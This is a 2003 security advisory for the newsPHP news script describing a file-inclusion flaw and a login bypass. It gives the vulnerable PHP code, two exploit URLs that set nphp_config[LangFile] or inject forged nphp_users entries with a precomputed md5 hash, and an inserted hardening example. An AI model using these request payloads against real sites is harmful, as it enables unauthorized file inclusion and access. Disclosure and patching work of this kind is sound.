newsPHP file inclusion & bad login validation

From: Dariusz 'Officerrr' Kolasinski (officerrrat_private)
Date: Sun Aug 24 2003 - 20:04:22 PDT


    newsPHP arbitrary file inclusion & bad login validation
    
    ===+++===+++===+++
    Product: newsPHP
    Version: <= v216
    Vendor: http://www.nphp.net
    Author: Officerrr <officerrrat_private>
    Discovered by: Officerrr <officerrrat_private>
    Vendor Response: Not contacted yet...
    ===+++===+++===+++
    
    
    Problem #1:
    ===+++===+++===+++
    An attacker can include any existing file on the web server
    if LangFile is not set in the config (it is not set by default).
    
    
    PHP Code/Location #1:
    ===+++===+++===+++
    -- from nphpd.php
    [..]
    // We know what we are supposed to be doing
    // now. Load in a custom language if they
    // have it set.
    [..]
    Oh yeah, we are ;]
    [..]
      if(isset($nphp_config["LangFile"]))
      {
        if(strtolower($nphp_config["LangFile"]) != "default" && $nphp_config["LangFile"] != "" && file_exists($nphp_config["LangFile"]))
        {
          include($nphp_config["LangFile"]);
        }
      }
    [...]
    
    
    Exploit #1:
    ===+++===+++===+++
    http://[host]/nphp/nphpd.php?nphp_config[LangFile]=/evil/file
    
    
    Problem #2:
    ===+++===+++===+++  
    A user can perform any action other than 'login' without knowing
    a valid username and password.
    
    
    Snip #2:
    ===+++===+++===+++
    md5('a') is '0cc175b9c0f1b6a831c399e269772661'
    
    
    PHP Code/Location #2:
    ===+++===+++===+++
    -- from nfunc.php
      function LoadSettings(&$config, &$users)
    [...]
              $users[$id][] = eregi_replace("[\n\r]","",$raw_config_line[$x]);
    [...]
    
    -- from nphpd.php
    [...]
    LoadSettings($nphp_config, $nphp_users);
    [...]
        for($i = 0; $i < count($nphp_users); $i++)
              {
                      if((strtolower($nphp_users[$i][0]) == strtolower($uname)) && ($nphp_users[$i][1] == md5($pword)))
                      {
    [...]
    // hmmmm, so we can inject users using nphp_users[index] in the URL
    
    
    Exploit #2:
    ===+++===+++===+++
    http://[host]/nphp/?[action here, example: output]&
         pword=a&
         uname=[fake usernamehere]&
         nphp_users[user index here][0]=a&
         nphp_users[user index here][1]=0cc175b9c0f1b6a831c399e269772661&
         nphp_users[user index here][3]=5
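    For comparison, here is how both problems can be closed on the application side. This is an added example, not newsPHP's own code: it assumes nfunc.php (with the LoadSettings() shown above) is available, that language files live in a directory passed as $lang_dir, and that only uname/pword are ever read from the request.

```php
<?php
// Added example (not newsPHP's code): hardened versions of the two patterns
// from the advisory. Assumes nfunc.php provides LoadSettings().
require_once 'nfunc.php';

// Reset both arrays before loading. The original relied on whatever was
// already in $nphp_config / $nphp_users, so ?nphp_users[...] and
// ?nphp_config[LangFile] from the query string survived LoadSettings().
$nphp_config = array();
$nphp_users  = array();
LoadSettings($nphp_config, $nphp_users);

// Problem #1: include a language file only if it is a plain file name
// that resolves to a path inside the language directory.
function load_language_file(array $config, $lang_dir)
{
    if (!isset($config['LangFile']) || strtolower($config['LangFile']) === 'default') {
        return false;
    }
    // No directory separators, no "..", no NUL bytes: just an identifier.
    if (!preg_match('/^[A-Za-z0-9_-]+\.php$/', $config['LangFile'])) {
        return false;
    }
    $base = realpath($lang_dir);
    $path = realpath($lang_dir . DIRECTORY_SEPARATOR . $config['LangFile']);
    // realpath() resolves symlinks and "..": the prefix check pins it to $lang_dir.
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    include $path;
    return true;
}

// Problem #2: check credentials only against the users read from disk,
// and compare the hashes in constant time.
function check_login(array $users, $uname, $pword)
{
    $hash = md5($pword);   // newsPHP stores md5(); password_hash() is the modern choice
    foreach ($users as $u) {
        if (isset($u[0], $u[1]) && strtolower($u[0]) === strtolower($uname)
            && hash_equals($u[1], $hash)) {
            return true;
        }
    }
    return false;
}

// Only the username and password are taken from the request.
$uname = isset($_REQUEST['uname']) ? (string) $_REQUEST['uname'] : '';
$pword = isset($_REQUEST['pword']) ? (string) $_REQUEST['pword'] : '';
$logged_in = check_login($nphp_users, $uname, $pword);
```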
    
    -- 
    Pozdrawiam,
    Dariusz 'Officerrr' Kolasinski
    [Linux Administrator] [gg: 516354] [uin: 83041742]
    "Silent my voice, I've got no choice..."
    


